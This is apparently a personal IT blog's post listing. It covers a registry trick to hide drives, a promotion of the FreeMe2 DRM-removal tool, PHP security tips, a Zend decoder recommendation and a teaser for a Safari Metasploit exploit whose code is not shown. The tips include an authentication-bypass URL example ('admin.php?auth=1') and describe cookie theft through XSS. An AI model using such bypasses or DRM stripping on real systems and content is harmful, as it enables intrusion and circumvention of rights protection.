Menekali  Just another IT Blog.

Ever wish you could make one of your computer’s drives invisible to anyone snooping around on your system? Well, happy days are here my friend! Whether you have sensitive docs, pictures, or any other private data, this is one of the easiest ways to keep them safe. Keep in mind that you’ll still be able to access your hidden drives; you just won’t see that they exist in Windows Explorer or the My Computer folder. Back up your registry before you start!

1. Open Regedit.

2. Navigate to one of these strings:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this only changes the settings for the current logged in user

HKEY_LOCALMACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this changes the settings for all users on the machine. You may have to create the key folder “Explorer” manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value “NoDrives” (without the quotes). This value defines local and network drive visibility for each logical drive on the computer. All drives will be visible as long as this value’s data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as NoDrives value data. When you right-click on NoDrives and choose Modify, make sure you select Decimal base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, you simply add the drive amounts together for a combined total.

For example, to hide the D:/ and T:/ drives, add the decimal value for the D:/ drive to the decimal value to the T:/ drive.

8 (D) + 524288 (T) = 524296

To disable all of your visible drives, set the value to 67108863.

You must reboot your PC to see your changes.

A while back, I purchased a Napster membership. At $14.95 a month I could download all the MP3 files I could find, and listen to them as much as I wanted. No restrictions right? Wrong. Unless you use their proprietary MP3 player to play the music, then you can’t listen it on any other device. IE… the Ipod. I couldn’t believe it. What an utter crock of shit. I didn’t particularly like iTunes soley on the fact, I wanted free reign to all the music I could find. Sound wrong? No, I fucking paid what they wanted, now give me my fucking music!

Much to my dismay, Napster instituted a form of DRM protection on their music. This fucking sucks. What am I supposed to do? I bought this subscription purely on the intention of filling my iPod with lots of music to listen to. /sigh indeed.

So I was on a conquest to figure out how I could get this music to play on my Ipod. One method was using a winamp plugin to record the the soundcards output, and save it to a file. Apparently it took a long time to complete, and was buggy. Great, so what next? The next option, was burning all of the files to a CD, then bringing them back to the computer, thus removing the DRM protection. Wow, that’s not going to take for-fucking ever!

There HAS to be some sort of software to fix this right? At the time (this was about two years ago) there wasn’t much honestly. A few proof of concepts here, and few alphas there. Nothing. - Flash forward 6 months, and I stumbled across FairUse4WM, which worked marvelously. Albeit EVERY song was prefixed with a damn FAIRUSE4WM_ tag, which was… annoying to say the least, I dealt with it. It worked fine, and then stopped working, and I gave up. Meh…

Well apparently there is a new kid on the block, for everyone dealing with DRM issues. This will handle not only music files, but video, and even streaming files!

From the Author:

From the author - After many hours of fighting with WM-DRM protection I decided to create new tool that would allow people to remove it from from files and streams. Of course FairUse4WM is great tool and it works nice but there are few reasons why have decided to create a new one:
1) FairUse4WM is closed source. Everytime MS releases new version of IBX people have to make binary patches or start from scratch.
2) FairUse4WM doesn’t work with video streams since it wasn’t intended to. Of course it is possible to record video stream and then undrm it but this is pointless when we are talking about tv channels.
3) There is no platform independent tool for ms wm-drm. There is no point of running windows every time you want to undrm some file or stream.

FreeMe2 is the program. Based on famous freeme app created by Beale Screamer and based on viodentias (FairUse4WM) findings. It strips wm-drm protection from wmv/asf/wma files as well as video/audio streams.

Download and info at SourceForge
More Instructions and information at Stream-Recorder.com

FootNote: I canceled my Napster subscription long ago. This rendered my music unusable, and my files were removed. They billed me for another year afterwards, after repeated complaints to them, the credit company. Finally it stopped… they gave me $30 back. Fucking morons.

Recently, I was re-doing how my permalink structure worked on this blog. My original structure was: index.php/p=%postid. For various, somewhat obvious reasons I wanted this changed.

So I changed it to: index.php/post_title/ .  Right, so all worked well, I had my new permalink and directory structures all set up, good good. Now, I have a digg counter, and submitter in my post loop, for every one of my posts. After changing my permalink structure, I noticed, none of the my diggs were showing up! What?! Hmmmm

My most recent post (at the time) I simply dugg again. Went through the routine, submitted it (even though however my last post showed up on the duplicate list, only time that thing has EVER detected ANYTHING remotely close to what I was digging). Finalized my digg, and went back to my page. And reloaded.

What do I see? 6 diggs. That’s what I had before it cleared them out on here. But no more than literally 3-4 minutes later, I had 3 more diggs. Didn’t make much sense, they don’t come in that quick, unless I’ve just submitted it. And that’s what happened.

I effectively re-synched my post. I changed the url of my digg, so none of them showed up. However, once I went and submitted it again, all of my previous diggs for that post re-appeared, and the post was back up on top in the digg site.

Now this would’nt be a very effective way on a daily basis to try and get more diggs, how ever you like your traffic. It could though, help you if you have a message of particular interest to you, you’d like to see recieve more attention.

If there’s anything I particularly hate when it comes to SEO, it’s the meta keywords tag. I so wish it had never been invented. It’s practically useless, yet people still obsess over it. In this article, I’ll explain more about why you shouldn’t worry about it except perhaps for misspellings, as well as which search engines support it.

The meta keywords tag is one of several of meta tags that you can insert into your web pages to provide search engines with information about your pages that isn’t visible on the page itself. For example, my Meta Robots Tag 101: Blocking Spiders, Cached Pages & More article covers how you can use a different meta tag — the meta robots tag — to block pages from being indexed. Users don’t see this information (unless they look at your source code), but search engines do.

I recently read an interesting article I think may help some people with SEO concerns out there for their major sites and / or blogs. The above is a quote from the article. Link is below:

Link:  Meta Keywords Tag 101: How To “Legally” Hide Words On Your Pages For Search Engines.

PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL

I read about many of these points in books and tutorials but I was rather lazy to think about many of them initially learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess.
1.

Do not trust user input

If you are expecting an integer call intval() (or use cast) or if you don't expect a username to have a dash (-) in it, check it with strstr() and prompt the user that this username is not valid.

Here is an example:

Now $post_id will be an integer for sure

2. Validate user input on the server side

If you are validating user input with JavaScript, be sure to do it on the server side too, because for bypassing your JavaScript validation a user just needs to turn their JavaScript off.
JavaScript validation is only good to reduce the server load.

3. Do not use user input directly in your SQL queries

Use mysql_real_escape_string() to escape the user input.
PHP.net recommends this function: (well a little different)

Then you can use it like this:

4. In your SQL queries don't put integers in quotes

For example $id is suppose to be an integer:

Note that, using intval() would fix the problem here.

5. Always escape the output

This will prevent XSS (Cross Site Scripting) attacks, imagine you receive and save some data from a user and you want to display this data on a web page later (maybe his/her bio or username) and the user puts this bit of code in the input field along with his bio:

If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:

With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.

When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');

6. When uploading files, validate the file mime type

If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.

One quick way is to check the file extension:

Note that validating extension is a very simple way, and not the best way, to validate file uploads but it's effective;
simply because unless you have set your server to interpret .jpg files as PHP scripts then you are fine.

7. If you are using 3rd party code libraries, be sure to keep them up to date

If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.

8. Give your database users just enough permissions

If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.

9. Do not allow hosts other than localhost to connect to your database

If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.

10. Your library file extensions should be PHP

.inc files will be written to the browser just like text files (unless your server is setup to interpret them as PHP scripts), users will be able to see your messy code (kidding) and possibly find exploits or see your passwords etc.
Have extensions like config.inc.php or have a .htaccess file in your extension (templates, libs etc.) folders with this one line:

11. Have register globals off or define your variables first

Register globals can be very dangerous, consider this bit of code:

Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1

If you have registered globals on and you can't turn it off for some reason you can fix these issues by defining your variables first:

Defining your variables first is a good programming practice that I suggest you follow anyway.

12. Keep PHP itself up to date

Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important.

13. Read security books

Always find new books about PHP security to read; you can start by reading the 4th book in the Learning PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.

14. Contribute to this list

Feel free to reply to this post and add to this list, it will be helpful for everyone!

If you find this useful, please Digg   and / or comment please!

Related to the last post. When switching to the Cricket network, you will not have web, and picture sms abilities. The post below over at howard forums will give you all of the information you need.

Link:  http://www.howardforums.com/showpost.php?p=9772640&postcount=2

A lot of people are beginning to take advantage of Cricket Mobile. It's really gaining speed here in San Diego, and has been for quite some time in the more eastern regions of the U.S. Why wouldn't it? The prices are great, there is no contract, unlimited sms, picture sms, internet, all kind of thing. Albeit, the internet from this network is a joke, but it's generally pretty limited by the phone its self. Which brings me to my next point.

With all of these great prices and deals coming out of Cricket, people often get to the store, or start doing their research. Then they find out, the phone selection for cricket is terrible. The only thing close to a 'cool' or interactive phone, is the Kyocera Lingo. The lingo has a terrible internet display, comes with no serial cable, headphones for driving, and often de-synchs from the Cricket network causing missed calls, the inability to send sms messages, and more really weird issues. It breaks very easily, and costs well above what it should ($200.00). But it's arguably the 'best' and most popular phone in their line up. What can be done about it?

Cricket works on the CDMA cellular network. That means a lot of VZW (verizon), and SNXTL(sprint) will work (granted sprint phones getting internet access is a bit trickier.) The two most common phones to be 'converted' are the Treo 600/650, and the LG enV. This guide is for the Treo 600/650. I may do one for the enV at a later date. Also, it should be said now, you may render your phone useless if caution, and patience is not exercised while doing this. But in the end, you will have a PDA on the Cricket network, even though Cricket tells you that just won't work.

Guide just after the break.

Read the rest of this entry »

If you've ever come across code from a previous PHP programmer, and want to make change but can't because it's been Zend encoded, you know how frustrating that can be. Programmers can hide back doors, shell code, anything they like, as the code has been fully obfuscated with the Zend encoder.

 W4k1ng.net has released an online De-Zending script. Simple submit your Zend encoded files, wait for the file to be decoded, and download your decoded PHP script in a .ZIP file.

Check it out. I've tested it, and it works!

W4k1ng De-Zender 

This is an interesting and apparently "critical" live exploit for remote code execution through Safari. Below is the Metasploit file.

Exploit code just after the break.

Read the rest of this entry »